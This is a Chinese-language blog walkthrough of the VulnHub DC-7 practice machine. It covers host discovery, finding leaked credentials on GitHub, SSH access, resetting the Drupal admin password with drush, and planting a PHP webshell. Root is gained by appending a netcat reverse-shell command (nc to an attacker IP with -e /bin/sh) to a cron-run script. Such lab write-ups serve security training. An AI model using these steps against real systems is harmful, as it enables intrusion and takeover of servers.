首页 > 其他分享 >vulnhub靶机:dc-7

vulnhub靶机:dc-7

时间:2024-03-14 11:55:17浏览次数:27  
标签:10.9 dc -- vulnhub drush 靶机 password root admin

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

靶机IP

10.9.23.157

2:端口扫描

nmap -A -p- -T4 10.9.23.157

3:端口探测

给的提示去搜索一下

@DC7USER

发现是github的一些代码,下载进行查看

在config.php配置文件里发现了用户名和密码

$username = "dc7user";

$password = "MdR3xOgB7#dW";

尝试右上角的登录界面

登陆失败

二:渗透测试

1:ssh登录

尝试ssh登录

ssh dc7user@10.9.23.157

在产看文件发现存在一个定时任务

cd /opt/scripts/

2:漏洞利用

发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。

drush常用命令:

$ drush cr  各种清缓存

$ drush pm-enable 安装module

$ drush pm-uninstall 卸载module

$ drush pm-list  显示所有modules and themes列表

$ drush user-password admin --password "123" 更改密码

cd /var/www/html

drush user-password admin --password="root"

然后用更改后的密码登录到系统中:

使用以下命令创建新用户:

drush user-create root --password "root"

drush user-password root --password="root"

新创建的用户没有东西,还是去admin

dc7的CMS是Drupal8,已经移除了PHP Filter(php过滤器),后续作为一个模组存在,可以手动安装。在官网找到下载链接,下载之后给 DC-7 安装

http://drupal.org/project/php

在Content中添加一句话木马,依次点击:content(内容)→add content→basic page(为静态内容使用基本页面),测试添加,命名为ceshi。选择format为php code。

挂一句话木马()

使用蚁剑连接,反弹shell

三:提权

写入反弹shell、交互式shell然后提权,不过前面用drash命令时,发现是定时任务,可以再定时任务中添加用/bin/bash执行的nc命令,然后监听:

nc 10.9.23.112 6666 -e /bin/sh

定时任务需要等待一会

成功拿下

标签:10.9,dc,--,vulnhub,drush,靶机,password,root,admin
From: https://www.cnblogs.com/woaishuaidan/p/18072549

相关文章

  • XADC采集外部信号实时显示在RGB屏幕中
    概述XADC在Xilinx7系列器件上可用。TheXADCisavailableinallArtix-7,Kintex-7,Virte-7,andZynq-7000SoCdevices.XADC需要例化使用,但是如果使用JTAG访问的话,就不需要例化,直接在Vivado软件中就可以直接访问XADC的各项数据,包括芯片温度、电压等数据。The......
  • 与LDO背道而驰的DCDC
    LDO:低压差线性稳压器,比较常见的芯片为117,LDO的特性就如他的中文名一样,因为他的原理其实就是类似通过控制一个可变电阻来控制电压,从而达到稳压的效果,因此稳定的电压差不能太大否则电流就会过大,所以LDO的稳压器一般发热比较严重,损耗比较高,DCDC:开关稳压器,比较常见的芯片是2596,D......
  • [BJDCTF2020]Easy MD5 1
    [BJDCTF2020]EasyMD51审题看到一个登录框,并且题目为ezMD5,猜测使用md5绕过SQL知识点md5的绕过解题使用ffifdyop绕过SQL查看源代码弱比较绕过输入?a[]=1&b[]=2发现为===强比较,由于md5对数组不敏感也可以使用数组绕过,这是md5的另一个特性,就是md5无法对数组进行......
  • DC电源模块在电子产品中的重要性分析
    DC电源模块在电子产品中的重要性分析BOSHIDADC电源模块在电子产品中具有重要的作用和意义。以下是一些分析: 1.提供稳定可靠的电源供应:电子产品的正常运行需要稳定可靠的电源供应。DC电源模块可以将交流电转换为直流电,并提供稳定的电压和电流输出,确保电子产品能够正常工作。......
  • MBR4060DC-ASEMI光伏专用二极管MBR4060DC
    编辑:llMBR4060DC-ASEMI光伏专用二极管MBR4060DC型号:MBR4060DC品牌:ASEMI封装:TO-263最大平均正向电流(IF):40A最大循环峰值反向电压(VRRM):60V最大正向电压(VF):V工作温度:-65°C~150°C反向恢复时间:ns重量:1.38克芯片个数:4芯片尺寸:130mil正向浪涌电流(IFMS):300AMBR4060DC特性:耐压......
  • GDCM:读取DICOM Series(附完整源码)
    GDCM:读取DICOMSeries以下是一个使用GDCM(GrassrootsDICOM)库读取DICOM系列的示例代码:#include<iostream>#include"gdcmReader.h"#include"gdcmFile.h"#include"gdcmFileHelper.h"#include"gdcmGlobal.h"#include"gdcmSyst......
  • GDCM:实现使用gdcm::Series类进行DICOM的序列化和反序列化操作(附完整源码)
    GDCM:实现使用gdcm::Series类进行DICOM的序列化和反序列化操作下面是一个使用GDCM库中的gdcm::Series类进行DICOM序列化和反序列化操作的示例代码:#include<iostream>#include"gdcmReader.h"#include"gdcmWriter.h"#include"gdcmGlobal.h"#include"gdcmSystem.......
  • GDCM:实现显示GDCM Dict(附完整源码)
    GDCM:实现显示GDCMDict要显示GDCM的字典(Dictionary),您可以使用GDCM提供的gdcm::Global类。以下是一个示例代码,用于显示GDCM字典的内容:#include<iostream>#include"gdcmGlobal.h"#include"gdcmDict.h"#include"gdcmDictEntry.h"intmain(){gdcm::Global......
  • Practical Learned Lossless JPEG Recompression with Multi-Level Cross-Channel Ent
    目录简介模型DCTCoefficientsRearrangement将系数重排Cross-ColorEntropyModelMatrixContextModelMulti-LevelCross-ChannelEntropyModel创新点实验设置训练数据集:测试数据集:训练细节:结果简介JPEG是一种非常流行的压缩方法,然而最近关于图像压缩的研究主要集中在未压......
  • Vulnhub之DarkHole_1
    DarkHole_1一信息收集IP扫描端口扫描访问80目录扫描查看目录80网页-->login注册用户我的id是2,那么应该有个账号是id=1,尝试越权修改id=1的密码把id改为1发现登陆成功,多了一个上传文件的地方,前面的目录扫描中我们也发现了/upload路径,尝试上传反弹shell上传一句话木......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99